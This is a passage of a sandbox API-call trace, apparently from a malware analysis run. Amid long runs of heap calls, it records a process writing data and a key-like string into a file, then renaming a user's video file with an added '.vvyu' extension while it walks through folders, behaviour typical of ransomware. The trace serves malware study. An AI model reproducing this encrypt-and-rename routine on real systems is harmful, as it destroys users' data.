hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.365] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0194.365] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0194.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0194.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0194.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0194.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0194.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0194.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a078 [0194.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0194.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0194.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0194.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0194.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0194.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0194.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0194.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0194.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a018 [0194.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0194.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0194.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0194.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0194.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0194.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0194.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0194.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a030 [0194.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0194.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0194.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0194.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a000 [0194.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0194.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a090 [0194.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0194.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0194.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0194.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a060 [0194.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0194.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a048 [0194.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0194.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0a8 [0194.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a048 | out: hHeap=0x6a0000) returned 1 [0194.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a048 [0194.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a060 | out: hHeap=0x6a0000) returned 1 [0194.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0194.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0194.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0194.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0194.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0194.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a018 | out: hHeap=0x6a0000) returned 1 [0194.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a018 [0194.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0194.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0194.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a078 | out: hHeap=0x6a0000) returned 1 [0194.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0194.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0a8 | out: hHeap=0x6a0000) returned 1 [0194.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0194.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0194.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0194.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0194.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0194.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a018 | out: hHeap=0x6a0000) returned 1 [0194.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0194.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0194.369] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0194.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0194.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eaab8 | out: hHeap=0x6a0000) returned 1 [0194.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0194.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0194.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0194.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0194.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0194.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0194.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0194.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0194.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a048 | out: hHeap=0x6a0000) returned 1 [0194.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0194.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a090 | out: hHeap=0x6a0000) returned 1 [0194.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0194.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a030 | out: hHeap=0x6a0000) returned 1 [0194.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a000 | out: hHeap=0x6a0000) returned 1 [0194.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0194.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0194.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0194.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fe8 | out: hHeap=0x6a0000) returned 1 [0194.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d423d0 | out: hHeap=0x6a0000) returned 1 [0194.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0194.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0194.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0194.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0194.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0194.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0194.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0194.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0194.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0194.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0194.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0194.375] WriteFile (in: hFile=0x584, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0xfd9b, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0xfd9b, lpOverlapped=0x0) returned 1 [0194.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0194.376] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xfda0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.376] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0194.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0194.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0194.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0194.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0194.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0194.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0194.378] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0194.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.378] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.378] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0194.378] CloseHandle (hObject=0x584) returned 1 [0194.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee380 [0194.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8b0) returned 0x2d49778 [0194.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee380 | out: hHeap=0x6a0000) returned 1 [0194.382] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\VNAR2BEit3ka1sGXw8sq.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\vnar2beit3ka1sgxw8sq.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\VNAR2BEit3ka1sGXw8sq.mp4.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\vnar2beit3ka1sgxw8sq.mp4.vvyu")) returned 1 [0194.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0194.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0194.384] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0194.387] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa368b10, ftCreationTime.dwHighDateTime=0x1d8a2f7, ftLastAccessTime.dwLowDateTime=0xb99b1390, ftLastAccessTime.dwHighDateTime=0x1d8a72b, ftLastWriteTime.dwLowDateTime=0xb99b1390, ftLastWriteTime.dwHighDateTime=0x1d8a72b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y5X8", cAlternateFileName="")) returned 1 [0194.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eaab8 [0194.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea9a8 [0194.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0194.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea9a8 | out: hHeap=0x6a0000) returned 1 [0194.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eaab8 | out: hHeap=0x6a0000) returned 1 [0194.388] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa368b10, ftCreationTime.dwHighDateTime=0x1d8a2f7, ftLastAccessTime.dwLowDateTime=0xb99b1390, ftLastAccessTime.dwHighDateTime=0x1d8a72b, ftLastWriteTime.dwLowDateTime=0xb99b1390, ftLastWriteTime.dwHighDateTime=0x1d8a72b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y5X8", cAlternateFileName="")) returned 0 [0194.389] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0194.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0194.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eaa30 | out: hHeap=0x6a0000) returned 1 [0194.390] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0194.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70068 | out: hHeap=0x6a0000) returned 1 [0194.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ef00 | out: hHeap=0x6a0000) returned 1 [0194.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0194.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0194.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ef78 | out: hHeap=0x6a0000) returned 1 [0194.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0194.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eff0 | out: hHeap=0x6a0000) returned 1 [0194.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0194.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2f068 | out: hHeap=0x6a0000) returned 1 [0194.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0194.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea898 | out: hHeap=0x6a0000) returned 1 [0194.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2f0e0 | out: hHeap=0x6a0000) returned 1 [0194.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0194.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea788 | out: hHeap=0x6a0000) returned 1 [0194.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0194.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea788 [0194.395] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0194.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.398] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.398] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.398] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.398] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0194.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.406] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.406] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.406] RtlAllocateHeap 